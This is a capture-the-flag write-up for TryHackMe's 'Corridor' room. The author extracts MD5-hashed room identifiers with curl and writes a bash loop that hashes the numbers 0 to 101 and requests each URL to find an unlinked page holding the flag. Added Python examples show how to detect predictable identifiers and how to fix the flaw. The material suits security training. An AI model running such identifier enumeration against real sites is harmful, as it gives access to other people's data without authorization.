30 March 2023

Pentesting Fun Stuff

following the cyber security path…

Corridor

This is a challenge from tryhackme.com which is marked as easy.

Enumeration

Normally I would start with a portscan to find a point of entry.
But in this case, there is useful information about the challenge:

You have found yourself in a strange corridor. Can you find your way back to where you came?
In this challenge, you will explore potential IDOR vulnerabilities. Examine the URL endpoints you access as you navigate the website and note the hexadecimal values you find (they look an awful lot like a hash, don't they?). This could help you uncover website locations you were not expected to access.

IDOR or insecure direct object references are a type of access control vulnerability that arises when an application uses user-supplied input to access objects directly.

So I’m going to fire up a browser and check out the website.

Recon

Every door leads to a room. But when we check the source code of the main page, there is something worth noticing right at the beginning.

The strings do look like hashes. A hash is a fixed-length digest computed from a string by a hashing algorithm such as SHA-1; in this case they are MD5 hashes (32 hexadecimal characters, the length of an MD5 digest). How do I know?
There is a very nice website with a large database of hashes and their plaintext counterparts: crackstation.net

But first I need to extract the hashes from the website.
You can do this in numerous ways, but I like to use the CLI.

curl -s 10.10.43.179 | grep title= | awk '{print $4}' | cut -d '"' -f2

The first part of this command retrieves the content of the website.
The second part keeps only the lines that contain title=.
The third part prints only the fourth whitespace-separated column.
The last part splits that column on double quotes and keeps the second field, i.e. the text between the first pair of quotes.

Then you can copy/paste the entire list into crackstation.
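The same extraction and the "do these look like hashes of a counter?" check, as an added example that is not part of the original post. It works on a constructed page (the markup and the room numbers are assumptions, not the challenge's real HTML) and recovers, for every title attribute, which small integer it is the MD5 of, which is the audit check that tells you the identifiers are predictable:

```python
import hashlib
import re
from typing import Dict, List, Optional


def md5_hex(text: str) -> str:
    """MD5 hex digest of a string, the same value `echo -n "$n" | md5sum` prints."""
    return hashlib.md5(text.encode()).hexdigest()


# Constructed sample page: three "door" links whose title attributes are MD5
# digests of the small integers 1, 2 and 3, plus one link whose identifier is
# not derived from a counter. This is invented test input, not the challenge page.
SAMPLE_HTML = (
    '<!DOCTYPE html>\n<map name="rooms">\n'
    + "".join(
        f'<area shape="rect" coords="{i},0,{i + 10},10" '
        f'href="{md5_hex(str(i))}" title="{md5_hex(str(i))}">\n'
        for i in (1, 2, 3)
    )
    + f'<area shape="rect" coords="40,0,50,10" '
    f'href="{md5_hex("not-a-counter")}" title="{md5_hex("not-a-counter")}">\n'
    + "</map>\n"
)


def extract_titles(html: str) -> List[str]:
    """Pull every title="..." attribute value out of a page.

    This is the curl | grep | awk | cut step done with a regex, so it does not
    depend on the attribute sitting in a particular column of the line.
    """
    return re.findall(r'title="([^"]*)"', html)


def build_id_table(max_id: int) -> Dict[str, int]:
    """Map md5(str(i)) -> i for i in 0..max_id (the candidate space to test)."""
    return {md5_hex(str(i)): i for i in range(max_id + 1)}


def recover_ids(hashes: List[str], max_id: int = 1000) -> Dict[str, Optional[int]]:
    """For each hash found on the page, report which small integer it is the
    MD5 of, or None if it is not the digest of any number in 0..max_id."""
    table = build_id_table(max_id)
    return {h: table.get(h) for h in hashes}


def predictable_fraction(hashes: List[str], max_id: int = 1000) -> float:
    """Share of page identifiers that are digests of small integers.

    A value near 1.0 means the 'hashed' identifiers are really just a counter
    and an unauthenticated visitor can enumerate every object by hashing
    candidate numbers.
    """
    recovered = recover_ids(hashes, max_id)
    return sum(1 for v in recovered.values() if v is not None) / len(recovered)


if __name__ == "__main__":
    found = extract_titles(SAMPLE_HTML)
    for digest, number in recover_ids(found).items():
        print(f"{digest}  ->  {number if number is not None else 'not a small integer'}")
    print(f"predictable: {predictable_fraction(found):.0%}")
```

On the constructed page three of the four identifiers map straight back to 1, 2 and 3, so the check reports 75% predictable; on a page where every door is a counter it would report 100%, which is exactly the situation the challenge description hints at.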

When I dump the list of hashes into crackstation, the plaintext counterparts show a pattern.
Because I need to find the correct hashes, I’m going to use a script to automate my search.

#!/bin/bash
url='http://10.10.43.179'
for number in {0..101}
do
# md5 of the bare number, without the trailing newline echo would otherwise add
hex="$(echo -n "${number}" | md5sum | awk '{print $1}')"
echo "${hex}"
# fetch the page for this hash; -E makes | an alternation so the 404 page is dropped
curl -s "${url}"/"${hex}" | grep -Ev "PUBLIC|404|Not Found|not found"
done

This script runs a for-loop iteratively from 0 to 100.
With every iteration it creates an MD5 hash of the current number (the loop runs over whatever range is given in the statement: for number in 'range').
With that hash it retrieves the content of the corresponding page, while filtering out the 404 errors.

The result is a small list of operational pages and one of them holds the flag.
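The root cause on the server side, shown as an added example that is not code from the challenge or the original post: a room lookup that resolves md5(room number) for anyone who asks, beside a hardened version that hands each session random, unguessable references and still checks authorization before serving the room. The room numbers, the "hidden room 0" and the session model are assumptions made for the illustration.

```python
import hashlib
import secrets
from typing import Dict, Iterable, List, Optional


def md5_hex(text: str) -> str:
    """MD5 hex digest of a string (same as the hashes seen in the challenge URLs)."""
    return hashlib.md5(text.encode()).hexdigest()


# Constructed backing store: rooms 1..13 are linked from the corridor, room 0 is
# not linked anywhere but exists (assumed layout, not the real challenge data).
ROOM_CONTENT: Dict[int, str] = {i: f"room {i} (constructed content)" for i in range(0, 14)}
PUBLIC_ROOMS = set(range(1, 14))


# --- vulnerable: direct object reference, lightly disguised with MD5 ------------
VULNERABLE_INDEX: Dict[str, int] = {md5_hex(str(i)): i for i in ROOM_CONTENT}


def vulnerable_lookup(token: str) -> Optional[str]:
    """Serve whatever room the token hashes to. No authorization check, so anyone
    who can hash a counter reaches the unlinked room as well."""
    room = VULNERABLE_INDEX.get(token)
    return None if room is None else ROOM_CONTENT[room]


# --- hardened: per-session indirect references plus an authorization check -------
class Session:
    """One visitor's session: the set of rooms they may see and a freshly minted
    random token for each of them (an indirect reference map)."""

    def __init__(self, allowed_rooms: Iterable[int]) -> None:
        self.allowed_rooms = set(allowed_rooms)
        self.token_to_room: Dict[str, int] = {
            secrets.token_hex(16): room for room in self.allowed_rooms
        }

    def links(self) -> List[str]:
        """Tokens to embed in this session's corridor page."""
        return list(self.token_to_room)


def hardened_lookup(token: str, session: Session) -> Optional[str]:
    """Resolve the token only through the caller's own map, then re-check that the
    resolved room is one this session is allowed to see."""
    room = session.token_to_room.get(token)
    if room is None or room not in session.allowed_rooms:
        return None
    return ROOM_CONTENT[room]


if __name__ == "__main__":
    print("vulnerable, guessed md5('0'):", vulnerable_lookup(md5_hex("0")))
    visitor = Session(allowed_rooms=PUBLIC_ROOMS)
    print("hardened, guessed md5('0'):", hardened_lookup(md5_hex("0"), visitor))
    print("hardened, own link:", hardened_lookup(visitor.links()[0], visitor))
```

The two checks in hardened_lookup are deliberately both present: the random token stops enumeration, and the allowed-rooms check is what still protects you if a token ever leaks or the mapping is later shared across sessions. Hashing a predictable value, as the vulnerable version does, adds no access control at all.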
